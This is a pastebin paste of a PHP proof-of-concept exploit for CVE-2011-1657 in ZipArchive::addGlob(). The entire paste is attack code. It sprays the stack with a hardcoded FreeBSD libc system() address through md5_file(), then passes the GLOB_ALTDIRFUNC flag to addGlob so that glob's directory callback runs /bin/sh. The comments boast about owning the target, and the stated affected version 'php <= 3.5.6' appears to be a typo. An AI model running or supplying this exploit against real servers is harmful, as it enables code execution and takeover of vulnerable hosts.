SHARE
TWEET

Untitled

a guest Jul 4th, 2011 1,087 Never
  1. <?php
  2.     /* CVE-2011-1657: php <= 3.5.6 ZipArchive::addGlob() missing glob flags filtering
  3.      *
  4.      * Lame and JustForFun FreeBSD PoC using GLOB_ALTDIRFUNC glob() flag to pown!
  5.      *
  6.      * (c) 2011 - Clement LECIGNE <clemun at gmail dot com>
  7.      */
  8.  
  9.     /* Create a file for our md5_file() stack spray.
  10.      */
  11.     $system_addr = "\x50\x78\x8d\x28";  /* FreeBSD 8.2-RELASE system() libc addr */
  12.     $own = fopen("owned", "w");
  13.     fwrite($own, str_repeat($system_addr, 4096/4));
  14.     fclose($own);
  15.  
  16.     /* Fake zip, empty file is a valid zip.
  17.      */
  18.     $path = "foo.zip";
  19.     unlink($path);
  20.     fopen($path, "a");
  21.     $nx=new ZipArchive();
  22.     $nx->open($path);
  23.  
  24.     /* Lame stack spraying \o/
  25.      */
  26.     md5_file("owned");
  27.  
  28.     /* Bing. globbuf.gl_opendir() = system()
  29.      */
  30.     $nx->addGlob("/bin/sh", 64);
  31. ?>
RAW Paste Data
Top